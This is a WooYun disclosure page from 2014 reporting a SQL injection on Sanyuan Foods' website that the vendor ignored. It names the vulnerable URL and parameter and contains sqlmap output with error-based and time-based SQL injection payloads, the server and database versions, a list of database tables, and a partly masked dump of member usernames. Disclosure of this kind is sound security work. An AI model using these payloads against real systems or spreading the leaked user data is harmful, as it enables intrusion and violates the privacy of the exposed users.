当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081320

漏洞标题:三元食品sql注入(4k用户信息泄漏)

相关厂商:三元食品

漏洞作者: xxsec

提交时间:2014-10-30 14:46

修复时间:2014-12-14 14:48

公开时间:2014-12-14 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入都懂·········

详细说明:

1.注入点:
http://www.sanyuan.com.cn/flash_upload.php?modelid=1
2

sqlmap identified the following injection points with a total of 305 HTTP(s) requests:
---
Place: GET
Parameter: modelid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: modelid=1 AND (SELECT 5026 FROM(SELECT COUNT(*),CONCAT(0x71626c7871,(SELECT (CASE WHEN (5026=5026) THEN 1 ELSE 0 END)),0x71676b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: modelid=1 AND SLEEP(30)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: powercms
[102 tables]
+------------------------------+
| powercms_admin               |
| powercms_admin_role          |
| powercms_admin_role_priv     |
| powercms_ads                 |
| powercms_ads_place           |
| powercms_ads_stat            |
| powercms_announce            |
| powercms_area                |
| powercms_attachment          |
| powercms_author              |
| powercms_block               |
| powercms_c_down              |
| powercms_c_info              |
| powercms_c_ku6video          |
| powercms_c_news              |
| powercms_c_picture           |
| powercms_c_product           |
| powercms_c_video             |
| powercms_cache_count         |
| powercms_category            |
| powercms_collect             |
| powercms_comment             |
| powercms_content             |
| powercms_content_count       |
| powercms_content_position    |
| powercms_content_tag         |
| powercms_copyfrom            |
| powercms_datasource          |
| powercms_editor_data         |
| powercms_guestbook           |
| powercms_hits                |
| powercms_ipbanned            |
| powercms_keylink             |
| powercms_keyword             |
| powercms_link                |
| powercms_log                 |
| powercms_mail                |
| powercms_mail_email          |
| powercms_mail_email_type     |
| powercms_map_centers         |
| powercms_map_points          |
| powercms_member              |
| powercms_member_cache        |
| powercms_member_company      |
| powercms_member_detail       |
| powercms_member_group        |
| powercms_member_group_extend |
| powercms_member_group_priv   |
| powercms_member_info         |
| powercms_menu                |
| powercms_menu_51net          |
| powercms_menu_copy           |
| powercms_message             |
| powercms_model               |
| powercms_model_field         |
| powercms_model_field_bak     |
| powercms_module              |
| powercms_order               |
| powercms_order_deliver       |
| powercms_order_log           |
| powercms_pay_card            |
| powercms_pay_exchange        |
| powercms_pay_payment         |
| powercms_pay_pointcard_type  |
| powercms_pay_stat            |
| powercms_pay_user_account    |
| powercms_player              |
| powercms_position            |
| powercms_process             |
| powercms_process_status      |
| powercms_role                |
| powercms_search              |
| powercms_search_type         |
| powercms_session             |
| powercms_status              |
| powercms_times               |
| powercms_type                |
| powercms_urlrule             |
| powercms_video               |
| powercms_video_count         |
| powercms_video_data          |
| powercms_video_position      |
| powercms_video_special       |
| powercms_video_special_list  |
| powercms_video_tag           |
| powercms_vote_data           |
| powercms_vote_option         |
| powercms_vote_subject        |
| powercms_vote_useroption     |
| powercms_workflow            |
| powercms_yp_apply            |
| powercms_yp_buy              |
| powercms_yp_cert             |
| powercms_yp_collect          |
| powercms_yp_count            |
| powercms_yp_guestbook        |
| powercms_yp_job              |
| powercms_yp_news             |
| powercms_yp_product          |
| powercms_yp_relation         |
| powercms_yp_stats            |
| powercms_yp_stock            |
+------------------------------+


3部分数据

mask 区域 
*****njection points with a *****
*****-*****
*****: G*****
*****: mod*****
*****rror-b*****
*****error-based - WH*****
***** (5026=5026) THEN 1 ELSE 0 END)),0x71676b7871,FLOO*****
**********
*****R time-b*****
*****.0.11 AND ti*****
*****lid=1 AND*****
*****-*****
*****system: Lin*****
*****ogy: Apache *****
*****MS: My*****
***** powe*****
*****rcms_m*****
*****ntr*****
*****--------+--------+---------+-----------*****
*****        | amount | message | username  *****
*****--------+--------+---------+-----------*****
*****        | 0.00   | 0       | admin     *****
*****        | 0.00   | 0       | jack      *****
*****      | 0.00   | 0       | 王峰       *****
*****        | 0.00   | 0       | lsq       *****
*****        | 0.00   | 0       | 123       *****
*****        | 0.00   | 0       | yb_mky    *****
*****      | 0.00   | 0       | 所谓       *****
*****      | 0.00   | 0       | 所谓1      *****
*****om    | 0.00   | 0       | 梓凡       *****
*****        | 0.00   | 0       | xhk003    *****
*****    | 0.00   | 0       | 企业商桥    *****
*****m       | 0.00   | 0       | lingzi7522*****
*****.com.cn | 0.00   | 0       | chaiqiong *****
*****om      | 0.00   | 0       | 47111111  *****
*****        | 0.00   | 0       | mameihan  *****
*****        | 0.00   | 0       | yuanyuan  *****
*****      | 0.00   | 0       | 刘源源    *****
*****        | 0.00   | 0       | gromentt  *****
*****com     | 0.00   | 0       | searchfutu*****
*****      | 0.00   | 0       | 张军       *****
*****        | 0.00   | 0       | jim136    *****
*****        | 0.00   | 0       | 119776501 *****
*****        | 0.00   | 0       | liberydn  *****
*****      | 0.00   | 0       | 虎子       *****
*****om      | 0.00   | 0       | rosesnowjo*****
*****  | 0.00   | 0       | gcgc         | 0   *****

漏洞证明:

看详情

修复方案:

过滤

版权声明:转载请注明来源 xxsec@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝